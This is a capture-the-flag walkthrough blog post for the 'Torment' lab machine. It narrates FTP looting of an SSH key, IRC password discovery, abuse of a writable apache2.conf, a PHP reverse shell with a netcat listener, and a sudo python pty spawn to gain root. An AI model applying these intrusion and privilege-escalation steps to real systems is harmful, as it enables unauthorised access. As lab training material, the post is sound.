Torment CTF walkthrough (IRC server exploitation and misusing apache server’s intended functionality)

Mridul Bhardwaj
4 min readJun 28, 2021

Security Level: Intermediate

Scanning with nmap

FTP anonymous login allowed

Some other important ports are also open i.e. 25 (smtp), 631 (cups), 6667–6669 (IRC).

Exploring files in FTP server

there are 2 interesting files i.e. .ngircd and .ssh

inside .ssh file we found RSA private key which we will use later to gain access via SSH login

And inside .ngircd there are two channel names which can be useful

Inside the ngircd.conf file we can see the default password for connecting to IRC servers

I am using pidgin IRC client to connect to IRC server with the default password

Lets join a channel which we have found earlier on the .ngircd directory

Inside #games channel there is nothing interesting so we will try to join another channel

Joining another channel i.e. #tormentedprinter from .ngircd directory

Yes! we found a password of something which can be useful later

We can see there are two user present on the machine i.e. patrick and qiu

Trying to logging in with SSH key found earlier and it is also asking for passphase we can use the password which we have found in the channel i.e. #tormentedprinter

We have gained an initial level of access and after this only we have to escalate our privilege to root for capturing the flag

we can use systemctl as root privilege without entering root password

finding a file(s) with all read,write,execute permission using find utility

Specifying 2<dev/null will filter out the errors so that they will not be output to your console. In more detail: 2 represents the error descriptor, which is where errors are written to. By default they are printed out on the console. /dev/null is the standard Linux device where you send output that you want ignored.

found 2 files with all permissions apache2.conf and index.html

Adding user qiu in apache2.conf file

Than preparing a php reverse shell script and copy it in the /var/www/html directory so that we can execute it from browser

At the same time we run netcat at listening mode so that when we execute the reverse php script, the reverse connection is received by us as user “qiu”

ran sudo -l command to find NOPASSWD executable programs

reverse connection caught on our local terminal

we can see that we can run python as sudo

used command sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’ to spawn a shell with its user and we got a root shell

there are 2 files in /root directory proof.txt and author-secret.txt, lets see them

inside author-secret.txt

Inside proof.txt

Hence! successfully rooted the machine

--

--

Mridul Bhardwaj

CEH v10 | CCNA v7 | OSCP aspirant | System and Network Penetration Tester